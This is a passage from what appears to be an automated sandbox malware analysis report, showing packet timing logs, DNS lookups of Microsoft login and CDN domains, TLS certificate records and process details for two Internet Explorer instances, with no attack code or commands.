Jul 9, 2019 03:22:15.306005955 CEST 60811 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:15.344815016 CEST 53 60811 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:18.036662102 CEST 57659 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:18.072875023 CEST 53 57659 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:18.101578951 CEST 54527 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:18.120796919 CEST 53 54527 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:33.459271908 CEST 60440 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:33.498903036 CEST 53 60440 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:34.615241051 CEST 62740 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:34.648251057 CEST 53 62740 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:34.807482958 CEST 62238 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:34.837987900 CEST 53 62238 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:36.174796104 CEST 65013 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:36.197906971 CEST 53 65013 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:36.586719036 CEST 55972 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:36.628884077 CEST 53 55972 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:37.413742065 CEST 51695 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:37.475236893 CEST 53 51695 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:37.620021105 CEST 60558 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:37.657002926 CEST 53 60558 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:39.055264950 CEST 63487 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:39.078263044 CEST 53 63487 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:39.146162987 CEST 54294 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:39.191160917 CEST 53 54294 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:40.320421934 CEST 65179 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:40.327626944 CEST 65315 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:40.335621119 CEST 49772 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:40.351214886 CEST 50135 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:40.362567902 CEST 53 65179 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:40.366381884 CEST 53 49772 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:40.372360945 CEST 53 65315 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:40.390448093 CEST 53 50135 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:43.518302917 CEST 65205 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:43.541495085 CEST 53 65205 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:44.350034952 CEST 64570 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:44.407598972 CEST 53 64570 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:44.782726049 CEST 62955 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:44.814117908 CEST 53 62955 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:45.325735092 CEST 59147 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:45.339833975 CEST 53 59147 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:45.847078085 CEST 61222 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:45.879093885 CEST 53 61222 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:46.334467888 CEST 59147 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:46.348403931 CEST 53 59147 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:46.857953072 CEST 61222 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:46.871692896 CEST 53 61222 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:47.344588041 CEST 59147 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:47.359529972 CEST 53 59147 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:47.860244989 CEST 61222 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:47.891139984 CEST 53 61222 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:49.359091997 CEST 59147 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:49.381702900 CEST 53 59147 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:49.857733965 CEST 61222 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:49.871602058 CEST 53 61222 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:53.363944054 CEST 59147 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:53.377852917 CEST 53 59147 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:53.869606018 CEST 61222 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:53.883584023 CEST 53 61222 8.8.8.8 192.168.2.5

Jul 9, 2019 03:23:04.888499975 CEST 56934 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:23:05.052109957 CEST 53 56934 8.8.8.8 192.168.2.5

Jul 9, 2019 03:23:05.881908894 CEST 56934 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:23:06.888025999 CEST 56934 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:23:06.933669090 CEST 53 56934 8.8.8.8 192.168.2.5

Jul 9, 2019 03:23:06.949147940 CEST 53 56934 8.8.8.8 192.168.2.5

Jul 9, 2019 03:23:08.899605989 CEST 56934 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:23:08.927752018 CEST 53 56934 8.8.8.8 192.168.2.5

Jul 9, 2019 03:23:12.906055927 CEST 56934 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:23:12.934633970 CEST 53 56934 8.8.8.8 192.168.2.5

Jul 9, 2019 03:24:16.948779106 CEST 55625 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:24:16.967993021 CEST 53 55625 8.8.8.8 192.168.2.5

Jul 9, 2019 03:24:17.961113930 CEST 55625 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:24:17.987577915 CEST 53 55625 8.8.8.8 192.168.2.5

Jul 9, 2019 03:24:18.964833975 CEST 55625 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:24:18.991202116 CEST 53 55625 8.8.8.8 192.168.2.5

Jul 9, 2019 03:24:20.979218006 CEST 55625 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:24:20.998610020 CEST 53 55625 8.8.8.8 192.168.2.5

Jul 9, 2019 03:24:24.992845058 CEST 55625 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:24:25.019279957 CEST 53 55625 8.8.8.8 192.168.2.5

Timestamp Source Port Dest Port Source IP Dest IP

Copyright Joe Security LLC 2019 Page 42 of 47

Page 43: Automated Malware Analysis Report for ...

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Jul 9, 2019 03:22:18.036662102 CEST 192.168.2.5 8.8.8.8 0x647f Standard query (0) secure.aadcdn.microsoftonline-p.com A (IP address) IN (0x0001)
Jul 9, 2019 03:22:18.101578951 CEST 192.168.2.5 8.8.8.8 0xc682 Standard query (0) code.jquery.com A (IP address) IN (0x0001)
Jul 9, 2019 03:22:33.459271908 CEST 192.168.2.5 8.8.8.8 0xf793 Standard query (0) secure.aadcdn.microsoftonline-p.com A (IP address) IN (0x0001)
Jul 9, 2019 03:22:34.615241051 CEST 192.168.2.5 8.8.8.8 0x96be Standard query (0) login.microsoftonline.com A (IP address) IN (0x0001)
Jul 9, 2019 03:22:34.807482958 CEST 192.168.2.5 8.8.8.8 0x4f22 Standard query (0) aadcdn.msauth.net A (IP address) IN (0x0001)
Jul 9, 2019 03:22:36.586719036 CEST 192.168.2.5 8.8.8.8 0x19d5 Standard query (0) signup.live.com A (IP address) IN (0x0001)
Jul 9, 2019 03:22:37.413742065 CEST 192.168.2.5 8.8.8.8 0x9b8 Standard query (0) acctcdn.msauth.net A (IP address) IN (0x0001)
Jul 9, 2019 03:22:40.320421934 CEST 192.168.2.5 8.8.8.8 0x6892 Standard query (0) statics-uhf-wus.akamaized.net A (IP address) IN (0x0001)
Jul 9, 2019 03:22:40.335621119 CEST 192.168.2.5 8.8.8.8 0x4067 Standard query (0) ajax.aspnetcdn.com A (IP address) IN (0x0001)
Jul 9, 2019 03:22:40.351214886 CEST 192.168.2.5 8.8.8.8 0x2817 Standard query (0) img-prod-cms-rt-microsoft-com.akamaized.net A (IP address) IN (0x0001)
Jul 9, 2019 03:22:44.350034952 CEST 192.168.2.5 8.8.8.8 0x7a7f Standard query (0) assets.onestore.ms A (IP address) IN (0x0001)

DNS Answers

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Jul 9, 2019 03:22:18.072875023 CEST 8.8.8.8 192.168.2.5 0x647f No error (0) secure.aadcdn.microsoftonline-p.com secure.aadcdn.microsoftonline-p.com.edgekey.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:18.120796919 CEST 8.8.8.8 192.168.2.5 0xc682 No error (0) code.jquery.com cds.s5x3j6q5.hwcdn.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:33.498903036 CEST 8.8.8.8 192.168.2.5 0xf793 No error (0) secure.aadcdn.microsoftonline-p.com secure.aadcdn.microsoftonline-p.com.edgekey.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:34.648251057 CEST 8.8.8.8 192.168.2.5 0x96be No error (0) login.microsoftonline.com prda.aadg.msidentity.com - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:34.648251057 CEST 8.8.8.8 192.168.2.5 0x96be No error (0) prda.aadg.msidentity.com www.prdtm.aadg.akadns.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:34.837987900 CEST 8.8.8.8 192.168.2.5 0x4f22 No error (0) aadcdn.msauth.net aadcdnoriginwus2.azureedge.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:36.197906971 CEST 8.8.8.8 192.168.2.5 0xed42 No error (0) login.msa.msidentity.com lgin.msa.trafficmanager.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:36.628884077 CEST 8.8.8.8 192.168.2.5 0x19d5 No error (0) signup.live.com account.msa.msidentity.com - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:36.628884077 CEST 8.8.8.8 192.168.2.5 0x19d5 No error (0) account.msa.msidentity.com account.msa.akadns6.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:36.628884077 CEST 8.8.8.8 192.168.2.5 0x19d5 No error (0) prda.aadg.msidentity.com www.prdtm.aadg.windows.net.nsatc.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:37.475236893 CEST 8.8.8.8 192.168.2.5 0x9b8 No error (0) acctcdn.msauth.net acctcdn.trafficmanager.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:37.475236893 CEST 8.8.8.8 192.168.2.5 0x9b8 No error (0) cs1227.wpc.alphacdn.net - 192.229.221.185 A (IP address) IN (0x0001)
Jul 9, 2019 03:22:39.078263044 CEST 8.8.8.8 192.168.2.5 0x64b1 No error (0) aa-hip-prod.southcentralus.cloudapp.azure.com - 104.215.74.84 A (IP address) IN (0x0001)
Jul 9, 2019 03:22:40.362567902 CEST 8.8.8.8 192.168.2.5 0x6892 No error (0) statics-uhf-wus.akamaized.net a849.dscg2.akamai.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:40.366381884 CEST 8.8.8.8 192.168.2.5 0x4067 No error (0) ajax.aspnetcdn.com mscomajax.vo.msecnd.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:40.390448093 CEST 8.8.8.8 192.168.2.5 0x2817 No error (0) img-prod-cms-rt-microsoft-com.akamaized.net a1449.dscg2.akamai.net - CNAME (Canonical name) IN (0x0001)
Jul 9, 2019 03:22:44.407598972 CEST 8.8.8.8 192.168.2.5 0x7a7f No error (0) assets.onestore.ms assets.onestore.ms.akadns.net - CNAME (Canonical name) IN (0x0001)

HTTPS Packets

Timestamp Source IP Source Port Dest IP Dest Port Subject Issuer NotBefore NotAfter JA3 SSL Client Fingerprint JA3 SSL Client Digest

Timestamp: Jul 9, 2019 03:22:37.642251968 CEST
Source IP: 192.229.221.185 Source Port: 443 Dest IP: 192.168.2.5 Dest Port: 49725
Subject: CN=prod-identitycdnsan.msauth.net
Issuer: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
NotBefore: Mon Dec 17 23:12:34 CET 2018
NotAfter: Thu Dec 17 23:12:34 CET 2020
Subject: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
NotBefore: Fri May 20 14:53:03 CEST 2016
NotAfter: Mon May 20 14:53:03 CEST 2024
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Jul 9, 2019 03:22:37.643217087 CEST
Source IP: 192.229.221.185 Source Port: 443 Dest IP: 192.168.2.5 Dest Port: 49727
Subject: CN=prod-identitycdnsan.msauth.net
Issuer: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
NotBefore: Mon Dec 17 23:12:34 CET 2018
NotAfter: Thu Dec 17 23:12:34 CET 2020
Subject: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
NotBefore: Fri May 20 14:53:03 CEST 2016
NotAfter: Mon May 20 14:53:03 CEST 2024
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Jul 9, 2019 03:22:37.643553019 CEST
Source IP: 192.229.221.185 Source Port: 443 Dest IP: 192.168.2.5 Dest Port: 49729
Subject: CN=prod-identitycdnsan.msauth.net
Issuer: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
NotBefore: Mon Dec 17 23:12:34 CET 2018
NotAfter: Thu Dec 17 23:12:34 CET 2020
Subject: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
NotBefore: Fri May 20 14:53:03 CEST 2016
NotAfter: Mon May 20 14:53:03 CEST 2024
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Jul 9, 2019 03:22:37.643855095 CEST
Source IP: 192.229.221.185 Source Port: 443 Dest IP: 192.168.2.5 Dest Port: 49728
Subject: CN=prod-identitycdnsan.msauth.net
Issuer: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
NotBefore: Mon Dec 17 23:12:34 CET 2018
NotAfter: Thu Dec 17 23:12:34 CET 2020
Subject: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
NotBefore: Fri May 20 14:53:03 CEST 2016
NotAfter: Mon May 20 14:53:03 CEST 2024
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Jul 9, 2019 03:22:37.646456957 CEST
Source IP: 192.229.221.185 Source Port: 443 Dest IP: 192.168.2.5 Dest Port: 49730
Subject: CN=prod-identitycdnsan.msauth.net
Issuer: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
NotBefore: Mon Dec 17 23:12:34 CET 2018
NotAfter: Thu Dec 17 23:12:34 CET 2020
Subject: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
NotBefore: Fri May 20 14:53:03 CEST 2016
NotAfter: Mon May 20 14:53:03 CEST 2024
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Jul 9, 2019 03:22:37.646611929 CEST
Source IP: 192.229.221.185 Source Port: 443 Dest IP: 192.168.2.5 Dest Port: 49726
Subject: CN=prod-identitycdnsan.msauth.net
Issuer: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
NotBefore: Mon Dec 17 23:12:34 CET 2018
NotAfter: Thu Dec 17 23:12:34 CET 2020
Subject: CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
NotBefore: Fri May 20 14:53:03 CEST 2016
NotAfter: Mon May 20 14:53:03 CEST 2024
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

Behavior

• iexplore.exe

• iexplore.exe

System Behavior

Analysis Process: iexplore.exe PID: 4576 Parent PID: 692

General

Start time: 03:22:14
Start date: 09/07/2019
Path: C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase: 0x7ff7033a0000
File size: 823560 bytes
MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

File Path Access Attributes Options Completion Count Source Address Symbol
File Path Offset Length Value Ascii Completion Count Source Address Symbol
File Path Offset Length Completion Count Source Address Symbol

Registry Activities

Key Path Completion Count Source Address Symbol
Key Path Name Type Data Completion Count Source Address Symbol
Key Path Name Type Old Data New Data Completion Count Source Address Symbol

Analysis Process: iexplore.exe PID: 4256 Parent PID: 4576

General

Start time: 03:22:15
Start date: 09/07/2019
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4576 CREDAT:17410 /prefetch:2
Imagebase: 0x1080000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

File Path Access Attributes Options Completion Count Source Address Symbol
File Path Offset Length Value Ascii Completion Count Source Address Symbol
File Path Offset Length Completion Count Source Address Symbol

Registry Activities

Key Path Name Type Old Data New Data Completion Count Source Address Symbol

Disassembly